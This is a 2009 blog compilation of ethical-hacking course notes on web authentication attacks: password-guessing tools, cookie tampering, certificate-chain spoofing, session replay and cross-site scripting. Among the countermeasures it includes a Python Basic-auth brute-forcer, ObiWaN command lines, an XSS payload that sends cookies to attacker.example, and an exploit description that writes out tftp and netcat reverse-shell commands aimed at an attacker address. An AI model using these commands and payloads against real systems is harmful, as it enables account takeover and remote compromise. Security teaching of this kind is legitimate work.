

Friday, November 13, 2009

Password Guessing

  • Password guessing attacks can be carried out manually or via automated tools.
  • Password guessing can be performed against all types of web authentication.

The common passwords used are:
root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]
Passwords are the principal means of authenticating users on the Web today. It is imperative that any Web site guard the passwords of its users carefully. This is especially important since users, when faced with many Web sites requiring passwords, tend to reuse passwords across sites. Compromise of a password completely compromises a user.

Attack Methods
Often Web sites advise users to choose memorable passwords such as birthdays, names of friends or family, or social security numbers. This is extremely poor advice, as such passwords are easily guessed by an attacker who knows the user. The most common way an attacker will try to obtain a password is through a dictionary attack. In a dictionary attack, the attacker takes a dictionary of words and names and tries each one to see if it is the required password. This can be automated with programs that can guess hundreds or thousands of words per second, which makes it easy for attackers to try variations: the word backwards, different capitalization, a digit appended to the end, and popular passwords.

Another well-known form of attack is the hybrid attack. A hybrid attack adds numbers or symbols to dictionary words in order to crack a password. Often people change their passwords by simply adding a number to the end of their current password; the pattern usually takes this form: first month the password is "site", second month it is "site2", third month it is "site3", and so on. A brute force attack is the most comprehensive form of attack, though it may take a long time to work depending on the complexity of the password; some brute force attacks can take a week or more.

Hacking Tool: WebCracker
  • WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.
  • It keys on the "HTTP 302 Object Moved" response to indicate a successful guess.
  • It will report every successful username/password pair found in the lists.
WebCracker allows the user to test a restricted-access website by trying user ID and password combinations against it. This program exploits a rather large hole in web site authentication methods: password protected websites may easily be brute-forced if there is no limit on the number of times an incorrect password or user ID can be tried.
Hacking Tool: Brutus

http://www.hoobie.net/brutus/
  • Brutus is a generic password guessing tool that cracks various types of authentication.
  • Brutus can perform both dictionary attacks and brute-force attacks, where passwords are generated from a given character set.
  • Brutus can crack the following authentication types: HTTP (Basic authentication, HTML Form/CGI), POP3, FTP, SMB and Telnet.

Brutus is an online or remote password cracker. More specifically, it is a remote interactive authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given target system. Examples of supported target systems are an FTP server, a password protected web page, a router console, a POP3 server, etc. It is used primarily in two ways:
  • To obtain the valid access tokens for a particular user on a particular target.
  • To obtain any valid access tokens on a particular target where only target penetration is required.
Brutus does very weak target verification before starting; in fact all it does is connect to the target on the specified port. In the context of Brutus, the target usually provides a service that allows a remote client to authenticate against the target using client supplied credentials. The user can define the form structure to Brutus of any given HTML form. This will include the various form fields, any cookies to be submitted in requests, the HTTP referrer field to send (if any) and of course the authentication response strings that Brutus uses to determine the outcome of an authentication attempt.

If Brutus can successfully read forms of the fetched HTML page then each form will be interpreted and the relevant fields for each form will be displayed. Any cookies received during the request will also be logged here. Brutus handles each authentication attempt as a series of stages, as each stage is completed the authentication attempt is progressed until either a positive or negative authentication result is returned at which point Brutus can either disconnect and retry or loop back to some stage within the authentication sequence.

Hacking Tool: ObiWan

http://www.phenoelit.de/obiwan/docu.html
  • ObiWan is a powerful Web password cracking tool. It can work through a proxy.
  • ObiWaN uses wordlists and alternations of numeric or alphanumeric characters as possible passwords.
  • Since web servers allow unlimited requests, it is only a question of time and bandwidth to break into a server system.
ObiWaN stands for "Operation burning insecure Web server against Netscape". It is now called Project 2086, after RFC 2068, the RFC that describes the HTTP/1.1 protocol; section 11.1 of that RFC describes the Basic authentication scheme. This is the most widely used authentication scheme for web servers and the one ObiWaN targets.

Web servers with a simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. Every user with an HTTP connection to a host with Basic authentication can try username-password combinations for as long as he or she likes. This allows the attacker to probe the system indefinitely.
Like other programs for UNIX system passwords (Crack) or NT passwords (L0phtCrack), ObiWaN uses wordlists and alternations of numeric or alphanumeric characters as possible passwords. Since web servers allow unlimited requests, it is a question of time and bandwidth to break into a server system. ObiWaN can be run in several modes. The following example tries to crack the username eccouncil on the host intranet:
./ObiWaN -h intranet -a eccouncil -w list.txt
To run it with alphanumeric variation with a depth of 2:
./ObiWaN -h intranet -a eccouncil -w list.txt -A 2
To run it in brute force loop mode:
./ObiWaN -h intranet -a eccouncil -w list.txt -b 6 -B 8
Hacking Tool: Munga Bunga

Munga Bunga's HTTP Brute Forcer is a utility that uses the HTTP protocol to brute force any login mechanism/system that requires a username and password on a web page (or HTML form). To recap: a password often contains only letters. In such a case the size of the character set is 26 or 52, depending on whether one letter case or both are used. Some systems (Windows, for example) make no difference between lower-case and upper-case letters. For an 8-character password, the difference amounts to a factor of 256, which is really significant.
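The arithmetic behind that factor of 256 can be checked in a couple of lines of Python; the 8-character length is just the example from the paragraph above.

# Keyspace for an 8-character, letters-only password.
lower_only = 26 ** 8                 # one letter case
mixed_case = 52 ** 8                 # both letter cases
print(lower_only)                    # 208827064576
print(mixed_case)                    # 53459728531456
print(mixed_case // lower_only)      # 256, i.e. 2**8 - one doubling per character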

The brute force method can be very effective when it is combined with the functionality of the program. Munga Bunga is a tool which can be used for breaking into emails, affiliate programs, web sites, any web based accounts, launching DoS attacks, flooding emails, flooding forms, flooding databases and much more; though the DoS and flooding activities are not supported or documented. Apart from this, the attacker can write definition files. These are files ending in the .def extension, and they contain information about a particular server and the data to submit to it. They are used to extend the power and capability of the program, based on the user's own definitions. The software comes bundled with some definition files.

The tool claims to be capable of brute forcing anything that can be entered via an HTML form with a password and username. The attack methodology goes as follows: the attacker uses a password file so that the program can attempt to enter the account(s) with the specified passwords. In addition, he can write a definition file for the form he wants to crack.

Hacking Tool: PassList

Passlist is another character based password generator.
PassList is a character based password generator that implements a small routine which automates the task of creating a "passlist.txt" file for any brute force tool. The program does not require much information to work. The tool allows the user to specify the generation of passwords based on any given parameter; for instance, if the user knows that the target system's password starts with a particular phrase or number, he can specify this. This makes the list more meaningful to the user and easier for the brute forcer. He can also specify constraints such as the maximum number of random characters per password.

A partial list is given below.
  • Refiner is used to generate a wordlist containing all possible combinations of a partial password, which an attacker may have obtained by other means. Refiner will then generate a text file containing all possible combinations.
  • WeirdWordz allows the user to select an input file and an output file, and makes all sorts of combinations of the lines/words in the input file.
  • Raptor 1.4.6 - applies many different filters to HTML files to create a wordlist.
  • PASS-PARSE V1.2 - Pass-parse will take any file and turn all the words into a standard type password list, while stripping anything that's not alphanumeric. The main idea behind it is that while trying to crack the password of a personal website, the password may appear on the site when the person describes their interests. This will parse through an html file and create a list of words from that page to try as passwords.
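As a rough illustration of what these generators do, the sketch below expands a known partial password with short alphanumeric suffixes and writes the result to a passlist.txt file. The prefix, character set and suffix length are illustrative assumptions, not options of any particular tool.

import itertools
import string

prefix = "site"                                   # phrase the password is known to start with
charset = string.ascii_lowercase + string.digits  # characters to append
max_suffix_len = 2                                # keep the example list small

with open("passlist.txt", "w") as out:
    for length in range(1, max_suffix_len + 1):
        for combo in itertools.product(charset, repeat=length):
            out.write(prefix + "".join(combo) + "\n")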

Web Based Password Cracking Techniques

Passport authentication messages are passed in the form of electronic "tickets" that are used to inform the site that the user has signed in successfully. A ticket is a small amount of data that indicates the time the sign in occurred, when the user last manually signed in, and other information that is useful to the authentication process. Within the Passport system, these tickets take the form of cookies.

To obtain a ticket, a user with a Passport account signs in to the site or tries to access a protected Web page within the merchant site (e.g., a page that requires user authentication before allowing access). This redirects the user to a special page on Passport.com. This page takes information that the merchant site has appended to the URL and processes it. This allows the Passport service to know which merchant site has referred the user, and which merchant site to return the user to. Once the information has been processed, Passport redirects the user to a page on Passport.net.

Once the user enters their credentials, they are sent back to the Passport.com domain. Once there and verified, Passport writes a cookie on the user's browser that stores information about this sign in. This is called a "ticket-granting-cookie" and it is used in subsequent sign in attempts. Passport then redirects the user back to the merchant site.

When the user arrives back at the merchant site, they bring two encrypted packets of information attached to the query string. Software called the Passport Manager, which is installed on the merchant's authenticating servers, reads those packets and writes them as encrypted cookies in the merchant site domain.

The first cookie contains the authentication ticket information. The second contains any profile information that the user has chosen to share, and any operational information and unique identifiers that need to be passed. These packets are encrypted with a unique secret key that is shared between Passport and the merchant site. This helps to ensure that only the merchant can decode these messages.

The merchant site then takes this information and uses it to issue its own cookies. Since these cookies are issued from the merchant domain, the merchant will have access to them. The merchant can use the Passport User ID to look a user up in the merchant database and perform authorization tasks.

When the user navigates to another Passport participating site, the new site has several choices to make about how they will authenticate this user. When the user clicks the sign in button, they are directed to the Passport service exactly as they were at their first sign in. The difference is that this time there is a ticket-granting-cookie saved on the browser that Passport can read.

Since the ticket contains the time that it was issued, it allows the referring site to decide how "fresh" the cookie needs to be in order for the site to accept it. If the ticket meets the rules the referring site has chosen, the user is redirected back to the referring site along with the encrypted ticket and profile cookies. If the ticket is too old, the user is prompted to re-enter their credentials.

Note

However, Passport has been plagued with security issues, ranging from reuse of the authentication cache to privacy-flouting activities. Apart from this, exploits that plague Microsoft based web systems, such as Unicode exploits, cross site scripting and cookie stealing, cast more than a shadow of doubt on this means of authentication.


Forms-Based Authentication
  • It is a highly customizable authentication mechanism that uses a form composed of HTML, with fields for the user to enter credentials.

  • After the data is input via HTTP or SSL, it is evaluated by some server-side logic and, if the credentials are valid, a cookie is given to the client to be reused on subsequent visits.

  • Forms based authentication is the most popular authentication technique on the Internet.

Conventionally, web applications had users authenticate themselves through a Web form. The user's credentials as captured by this form are submitted to the business logic which determines the authorization level. If the user is authenticated, the application generates a cookie or session variable. This cookie contains anything from a valid session identification access token to customized personalization values. The time period for which the cookie is valid or the contents stored in it are subject to security risks.

Forms Authentication is a system in which unauthenticated requests are redirected to a web form where the unauthenticated users are required to provide their credentials. In the context of ASP.NET, it extends similar logic into its architecture as an authentication facility, Forms Authentication. Forms Authentication is one of three authentication providers. Windows Authentication and Passport Authentication make up the other two providers.

Returning to the web based authentication method: once the user is properly verified by the application, based on the credentials he supplied, an authorization ticket is issued by the Web application in the form of a cookie. In essence, Forms Authentication is a means of wrapping the web application around the login user interface and verification processes.

Forms Authentication Flow

  • A client generates a request for a protected resource (e.g. a transaction details page).

  • IIS (Internet Information Server) receives the request. If the requesting client is authenticated by IIS, the user/client is passed on to the web application. However, if Anonymous Access is enabled, the client will be passed onto the web application by default. Otherwise, Windows will prompt the user for credentials to access the server's resources.

  • If the client doesn't contain a valid authentication ticket/cookie, the web application will redirect the user to the URL where the user is prompted to enter their credentials to gain access to the secure resource.

  • On providing the required credentials, the user is authenticated / processed by the web application. The web application also determines the authorization level of the request, and, if the client is authorized to access the secure resource, an authentication ticket is finally distributed to the client. If authentication fails, the client is usually returned an Access Denied message.
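The flow above can be reduced to a small, self-contained sketch. The credential store, ticket format and response strings are illustrative assumptions, not any particular framework's API.

import secrets

USERS = {"alice": "s3cret"}        # hypothetical credential store
TICKETS = {}                       # tickets issued after successful login

def login(username, password):
    # Step: the user supplies credentials and, if valid, receives a ticket (cookie).
    if USERS.get(username) == password:
        ticket = secrets.token_hex(16)
        TICKETS[ticket] = username
        return ticket              # would be delivered via a Set-Cookie header
    return None                    # Access Denied

def request_protected_page(ticket):
    # Step: a request arrives; without a valid ticket the client is redirected to the login form.
    if ticket not in TICKETS:
        return "302 redirect -> /login"
    return "200 OK -> protected resource for " + TICKETS[ticket]

print(request_protected_page(None))                       # 302 redirect -> /login
print(request_protected_page(login("alice", "s3cret")))   # 200 OK -> protected resource for alice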




Hacking Tool: WinSSLMiM
  • http://www.securiteinfo.com/outils/WinSSLMiM.shtml

  • WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates.

  • It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.

  • Usage:

    • FakeCert: fc -h

    • WinSSLMiM: wsm -h

We have seen how digital certificates are used for authentication purposes. Typically, the administrator of a web site opts to provide secure communication through the SSL. To enable this, the administrator generates a certificate and gets it signed by a Certification Authority. The generated certificate will list the URL of the secure web site in the Common Name (CN) field of the Distinguished Name section. The CA verifies that the administrator legitimately owns the URL in the CN field, signs the certificate, and gives it back.

[CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.website.com]

Note

When a web browser receives the certificate, it should verify that the CN field matches the domain it just connected to, and that it is signed by a known CA certificate. No man in the middle attack is possible because it should not be possible to substitute a certificate with a valid CN and a valid signature. However, it is possible that the signing authority has been delegated to more localized authorities. In this case, the administrator of www.website.com will get a chain of certificates from the localized authority:


Attack Methods

However, as far as IE is concerned, anyone with a valid CA-signed certificate for any domain can generate a valid CA-signed certificate for any other domain. If an attacker wants to, he can generate a valid certificate and request a signature from VeriSign:

[CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com]

Then he can generate a certificate for any domain he wants, and sign it using his CA-signed certificate:

[CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com] -> [CERT - Issuer: www.attacker.com / Subject: www.website.com]

Since IE does not check the Basic Constraints on the www.attacker.com certificate, it accepts this certificate chain as valid for www.website.com. This means that anyone with any CA-signed certificate (and the corresponding private key) can spoof anyone else. Any of the standard connection hijacking techniques can be combined with this vulnerability to produce a successful man in the middle attack.
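The missing check can be illustrated with a toy chain verifier. The certificates here are plain named tuples (no signatures or real X.509 parsing), and the domain names follow the example above.

from collections import namedtuple

Cert = namedtuple("Cert", "subject issuer is_ca")

chain = [
    Cert("www.website.com", "www.attacker.com", False),  # forged leaf certificate
    Cert("www.attacker.com", "VeriSign", False),          # attacker's legitimate, non-CA certificate
    Cert("VeriSign", "VeriSign", True),                   # trusted root
]

def chain_valid(chain, check_basic_constraints=True):
    for child, parent in zip(chain, chain[1:]):
        if child.issuer != parent.subject:
            return False
        if check_basic_constraints and not parent.is_ca:
            return False    # the signer is not authorised to act as a CA
    return True

print(chain_valid(chain))                                 # False: proper validation rejects the chain
print(chain_valid(chain, check_basic_constraints=False))  # True: the behaviour exploited in IE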




---Regards,
Amarjit Singh

What is Cookie ?

Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Cookies can be set using two main methods: HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies, as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information among themselves between sessions. Remembering that HTTP is stateless, this may simply be between requests for documents in the same session, or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying "show this to me next time you come in". Cookies cannot be shared (read or written) across DNS domains.

In correct client operation Domain A cannot read Domain B's cookies, but there have been many vulnerabilities in popular web clients which have allowed exactly this. Under HTTP the server responds to a request with an extra header. This header tells the client to add the information to the client's cookie file or store it in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created and that can read the variable.

flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.

path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as /reference/webprotocols. A pathname of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.

secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.

expiration: The time that the variable will expire on. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed.

name: The name of the variable.

The limit on the size of each cookie (name and value combined) is 4 KB. A maximum of 20 cookies per server or domain is allowed.
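For illustration, the attributes above can be emitted with Python's standard http.cookies module; the cookie name and values here are hypothetical.

from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session_id"] = "31d4d96e407aad42"
cookie["session_id"]["domain"] = ".example.com"    # which hosts may receive the cookie
cookie["session_id"]["path"] = "/reference"        # URL range the cookie is sent for
cookie["session_id"]["secure"] = True              # only sent over HTTPS
cookie["session_id"]["expires"] = "Fri, 13 Nov 2009 10:30:00 GMT"

# Prints a header along the lines of:
# Set-Cookie: session_id=31d4d96e407aad42; Domain=.example.com; expires=...; Path=/reference; Secure
print(cookie.output())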

Cookies are the preferred method to maintain state in the HTTP protocol. They are, however, also used as a convenient mechanism to store user preferences and other data, including session tokens. Both persistent and non-persistent cookies, secure or insecure, can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified, but this is not true; tools like WinHex are freely available. SSL also only protects the cookie in transit.

The extent of cookie manipulation depends on what the cookie is used for but usually ranges from session tokens to arrays that make authorization decisions.

A real-world example:

Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;

The attacker can simply modify the cookie to;

Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;

Hacking Tool: Helpme2.pl
  • Helpme2.pl is an exploit code for WinHelp32.exe Remote Buffer Overrun vulnerability.

  • This tool generates an HTML file with a given hidden command.

  • When this HTML file is sent to a victim through e mail, it infects the victim's computer and executes the hidden code.

Helpme2.pl is exploit code written to take advantage of the winhelp32.exe vulnerability. The Perl script takes a command to execute (WinExec, SW_HIDE) and produces an HTML output file. There are two versions:

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778

The exploit does the following:

  1. Executes tftp.exe -i attacker.ip.address get nc.exe c:\winnt\system32\nc.exe

  2. Executes nc.exe attacker.ip.address 80 -e cmd.exe

This code generates an HTML file with a given hidden command. When the HTML file is sent to a victim through email, it infects the victim's computer and executes the hidden code.

Hacking Tool: WindowBomb


An email sent with such HTML files attached will create pop-up windows until the PC's memory is exhausted.

Window bombs are code written to cause annoying behavior on the user's computer screen. Examples of the ones seen include:

Deadly image

A GIF which crashes the browser when clicked.

Uncloseable window

Opens a document that utilizes the JavaScript Unload event handler to reopen the document if you try to leave or close the window.

Invincible alert dialogue

Executes a function which generates an alert dialogue and then runs the function again

Reload-o-rama

Refreshes the document from the history 1000 times/second, leaving the back and stop buttons useless.

Window spawner

Continuously opens new windows until the RAM or swap space is full.

Jiggy window

Causes the window to dance around on the screen so fast that the controls cannot be reached.

Jiggy window spawner

Creates an endless stream of little dancing windows.

While loop processor hog

Executes an endless loop to chew up some processor time.

Recursive frames

Opens a set of recursive frames until the RAM or swap space is full.

Memory bomb

Dynamically allocates RAM to the browser until the RAM or swap space is full.

Super memory bomb

Opens a 100K document with numerous recursive tables and ordered lists.

Hacking Tool: IEEN

http://www.securityfriday.com/ToolDownload/IEen

  • IEEN remotely controls Internet Explorer using DCOM.

  • If you know the account name and the password of a remote machine, you can remotely control software components on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled.

IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure, and efficient manner. DCOM is installed on most Windows machines by default and runs without being noticed by users.

However, if an attacker knows the account name and the password of a remote machine, he can remotely control the software components on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.

Summary of IE'en Functionalities:

  • Remotely connects to or activates Internet Explorer

  • Captures data sent and received using Internet Explorer

  • Even on SSL encrypted websites (e.g. Hotmail), IE'en can capture user IDs and passwords in plain text.

  • Change the web page on the remote IE window.

  • Make the remote IE window visible / invisible

---------------------------------------------------------------------------------------------

Summary
  • Attacking web applications is the easiest way to compromise hosts, networks and users.

  • Generally nobody notices web application penetration until serious damage has been done.

  • Web application vulnerabilities can be eliminated to a great extent by ensuring proper design specifications and coding practices, as well as by implementing common security procedures.

  • Various tools help the attacker view source code and scan for security holes.

  • The first rule in web application development from a security standpoint is not to rely on client side data for critical processes. Using an encrypted session such as SSL and "secure" cookies is advocated instead of using hidden fields, which are easily manipulated by attackers.

  • A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.

  • If the application accepts only expected input, then the XSS can be significantly reduced.

---Regards,
Amarjit Singh

Authentication And Session Management

  • Brute/Reverse Force

  • Session Hijacking

  • Session Replay

  • Session Forging

  • Page Sequencing

Attack Methods

Brute Force

Brute Forcing involves performing an exhaustive key search of a web application authentication token's key space in order to find a legitimate token that can be used to gain access.

According to rfc2617, the Basic Access Authentication scheme of HTTP is not considered to be a secure method of user authentication (unless used in conjunction with some external secure system such as SSL), as the user name and password are passed over the network as cleartext. To receive authorization, the client sends the userid and password, separated by a single colon (":") character, within a base64 encoded string in the credentials.

user-pass = userid ":" password
userid    = *<TEXT excluding ":">
password  = *TEXT

For instance, if the user agent wishes to send the userid "Winnie" and password "the pooh", it would use the following header field:

Authorization: Basic V2lubmllOnRoZSBwb29o

Therefore, it is relatively easy to brute force a protected page if an attacker uses decent dictionary lists. For the page http://www.victim.com/private/index.html, an attacker can generate base64 encoded strings with commonly used usernames and passwords, generate HTTP requests, and look for a response other than "401 Unauthorized":
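A minimal sketch of such a dictionary attack, assuming a placeholder target URL and small wordlists, and treating any response other than 401 as worth reporting (only ever run something like this against systems you are authorised to test):

import base64
import urllib.request
from urllib.error import HTTPError

URL = "http://www.victim.com/private/index.html"     # placeholder target from the text
usernames = ["admin", "administrator", "webmaster"]
passwords = ["admin", "password", "test", "guest"]

for user in usernames:
    for pwd in passwords:
        token = base64.b64encode(f"{user}:{pwd}".encode()).decode()
        req = urllib.request.Request(URL, headers={"Authorization": "Basic " + token})
        try:
            urllib.request.urlopen(req)               # 200 OK means the guess worked
            print("Valid credentials:", user, pwd)
        except HTTPError as err:
            if err.code != 401:                       # anything other than Unauthorized is interesting
                print("Response", err.code, "for", user, pwd)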

Attack Methods

Session Replay

If a user's authentication tokens are captured or intercepted by an attacker, the session can be replayed by the attacker, making the concerned web application vulnerable to a replay attack. In a replay attack, an attacker openly uses the captured or intercepted authentication tokens such as a cookie to create or obtain service from the victim's account; thereby bypassing normal user authentication methods.

A simple example is sniffing a URL with a session ID string and pasting it back into the attacker's web browser. The legitimate user need not necessarily be logged into the application at the time of the replay attack. While it is generally understood that username/password pairs are authentication data and therefore sensitive, it is not as widely understood that these generated authentication tokens are just as sensitive. Many users who have extremely hard-to-guess passwords are careless with the protection of cookies and session information that can be just as easily used to access their accounts in a replay attack. This is often called forging "entity authentication", since most applications check the tokens stored in the browser or HTTP stream and do not require user authentication after each web request.

By simply sniffing the HTTP request of an active session or capturing a desktop user's cookie files, a replay attack can be very easily performed. Exploitation can take the following general forms:

  • Visiting a pre-existing dynamically created URL that is assigned to a specific user's account which has been sniffed or captured from a proxy server log

  • Visiting a specific URL with a preloaded authentication token (cookie, HTTP header value, etc.) captured from a legitimate user

  • A combination of the two.

Session tokens that do not expire on the HTTP server can allow an attacker unlimited time to guess or brute force a valid authenticated session token. An example is the "Remember Me" option on many retail websites. If a user's cookie file is captured or brute-forced, then an attacker can use these static-session tokens to gain access to that user's web accounts. Additionally, session tokens can be potentially logged and cached in proxy servers that, if broken into by an attacker, may contain similar sorts of information in logs that can be exploited if the particular session has not been expired on the HTTP server. To prevent Session Hijacking and Brute Force attacks from occurring to an active session, the HTTP server can seamlessly expire and regenerate tokens to give an attacker a smaller window of time for replay exploitation of each legitimate token. Token expiration can be performed based on number of requests or time.

Attack Methods

Session Forging/Brute-Forcing Detection and/or Lockout

Many websites have prohibitions against unrestrained password guessing (e.g., they can temporarily lock the account or stop listening to the IP address). With regard to session token brute-force attacks, however, an attacker can often try hundreds or thousands of session tokens embedded in a legitimate URL or cookie without a single complaint from the HTTP server. Many intrusion-detection systems do not actively look for this type of attack, and penetration tests also often overlook this weakness in web e-commerce systems. Designers can use "booby trapped" session tokens that never actually get assigned but will detect if an attacker is trying to brute force a range of tokens. Anomaly/misuse detection hooks can also be built in to detect if an authenticated user tries to manipulate their token to gain elevated privileges.

Attack Methods

Session Re-Authentication

Critical user actions such as money transfer or significant purchase decisions should require the user to re-authenticate or be reissued another session token immediately prior to significant actions. Developers can also somewhat segment data and user actions to the extent where reauthentication is required upon crossing certain "boundaries" to prevent some types of cross-site scripting attacks that exploit user accounts.

Attack Methods

Session Token Transmission

If a session token is captured in transit through network interception, a web application account is then prone to a replay or hijacking attack. Typical web encryption technologies used to safeguard the state mechanism token include, but are not limited to, the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLS v1) protocols.

Attack Methods

Session Tokens on Logout

With the popularity of Internet Kiosks and shared computing environments on the rise, session tokens take on a new risk. A browser only destroys session cookies when the browser thread is torn down. Most Internet kiosks maintain the same browser thread. It is recommended to overwrite session cookies when the user logs out of the application.

Attack Methods

Page Sequencing

Page sequencing is the term given to the vulnerability that arises as a result of poor session management, thereby allowing the user to take an out of turn action and bypass the defined sequence of web pages. This can be something like moving ahead to a later stage of a financial transaction. This arises due to faulty session/application state management.


Traditional XSS Web Application Hijack Scenario - Cookie stealing
  • The user is logged on to a web application and the session is currently active. An attacker knows of an XSS hole that affects that application.

  • The user receives a malicious XSS link via e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. a guest book, a banner, etc.) and make it load automatically without requiring user intervention.

Attack Methods

It is a fact that most web sites address security using SSL for authenticating their login sessions. Let us see how this process takes place. When the client connects to a web site two events take place to ensure security.

  1. The web site must prove that it is the web site it claims to be.

The web site authenticates itself by the SSL certificate issued to the domain in question by a trusted third party. Depending on the extent to which the user trusts the certificate issuer, s/he can be assured that the web site is what it claims to be.

Once the web site is authenticated by the user, he can choose to establish a secure data connection via the public key mechanism of SSL so that all the data that is transmitted between them is encrypted.

  2. The user must authenticate himself to the web site

The user provides his username/password into a form and this data is transmitted in an encrypted fashion to the web site for authentication. If the client is authenticated, a session cookie is generated with appropriate timeout and validation information. This is sent back to the user as a "secure cookie" - i.e. one that is only passed back and forth over SSL.

This can be considered as passing a shared secret back and forth, which is encrypted, is not the actual password, and does time out. If the website does not use cookies, it can opt for session codes that are embedded in the site URLs so that they are never stored on the hard disk of the client computer. Some web sites require their users to obtain client SSL certificates so that the web site can authenticate the clients via these certificates, removing the need for the whole username/password scheme.

Cookies were originally introduced by Netscape and are now specified in RFC 2965 (which supersedes RFC 2109), with RFC 2964 and BCP44 offering guidance on best practice. Cookies were never designed to store usernames and passwords or any sensitive information. There are two categories of cookies, secure or non-secure and persistent or non-persistent, giving four individual cookies types.

  • Persistent and Secure

  • Persistent and Non-Secure

  • Non-Persistent and Secure

  • Non-Persistent and Non-Secure

---Regards,
Amarjit Singh

What is Cross Site Scripting (XSS)?

  • A Web application vulnerable to XSS allows a user to inadvertently send malicious data to themselves through that application.

  • Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them.

  • These links cause client side scripting languages (VBScript, JavaScript, etc.) of the attacker's choice to execute on the victim's browser.

  • XSS vulnerabilities are caused by a failure in the web application to properly validate user input.

The simplest description of cross-site scripting is an attack that occurs when a user enters malicious data in a Web site. It can be as simple as posting a message that contains malicious code to a newsgroup. When another person views this message, the browser will interpret the code and execute it, often giving the attacker control of the system. Malicious scripts can also be executed automatically based on certain events, such as when a picture loads. Unlike most security vulnerabilities, XSS doesn't apply to any single vendor's products; instead, it can affect any software that runs on a web server.

XSS takes place as a result of the failure of the web based application to validate user supplied input before returning it to the client system. "Cross-site" refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim's browser to execute malicious code with the same permissions as the domain of the web application, an attacker can bypass the traditional document object model (DOM) security restrictions. The document object model is an application interface that allows client-side languages to dynamically access and modify the content, structure and style of a web page.

Cross-site scripting attacks require the execution of client-side languages (JavaScript, Java, VBScript, ActiveX, Flash, etc.) within a user's web environment. XSS can result in an attacker stealing cookies, hijacking sessions, changing web application account settings, and so on. The most common web components vulnerable to XSS attacks include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Moreover, a victim does not necessarily have to click on a link for the attack to be possible.

XSS Countermeasures
  • As a web application user, there are a few ways to protect yourself from XSS attacks.

  • The first and the most effective solution is to disable all scripting language support in your browser and email reader.

  • If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages.

  • Proxy servers can help filter out malicious scripting in HTML.

    Preventing cross-site scripting is a challenging task especially for large distributed web applications. If the application accepts only expected input, then the XSS can be significantly reduced.

    Web servers should set the character set, and then make sure that the data they insert is free from byte sequences that are special in the specified encoding. This can typically be done by settings in the application server or web server. The server should define the character set in each HTML page, for example:

    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

    Web pages with unspecified character-encoding work mostly because most character sets assign the same characters to byte values below 128. Some 16-bit character-encoding schemes have additional multi-byte representations for special characters such as "<"; these should be checked.
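A minimal sketch of output escaping with Python's standard html module; the payload string is only an example of reflected input.

import html

user_input = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"

# Escaped before being echoed back, the payload renders as inert text instead of executing:
print(html.escape(user_input, quote=True))
# &lt;script&gt;document.location=&#x27;http://attacker.example/?c=&#x27;+document.cookie&lt;/script&gt;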

Input Manipulation : Web Application Vulnerabilities

  • URL Manipulation CGI Parameter Tampering

  • HTTP Client-Header Injection

  • Filter/Intrusion Detection Evasion

  • Protocol/Method Manipulation

  • Overflows

In the context of a web based attack (or web server attack), the attacker will first try to probe and manipulate the input fields to gain access into the web server. They can be broadly categorized as given below.

URL Manipulation CGI Parameter Tampering: This is perhaps the easiest of the lot. By inserting unacceptable or unexpected input into the URL through the browser, the attacker tries to gauge whether the server is protected against common vulnerabilities.

HTTP Client-Header Injection: The next accessible point is the HTTP header. Using HTTP headers such as Referer, the attacker can manipulate the client side to suit his needs.

Filter/Intrusion Detection Evasion: The best part of attacking a web server is that the attacker can use the default port of entry - namely port 80 - to gain access into the network. As this is a standard port open for business needs, it is easy to evade intrusion detection systems or firewalls.

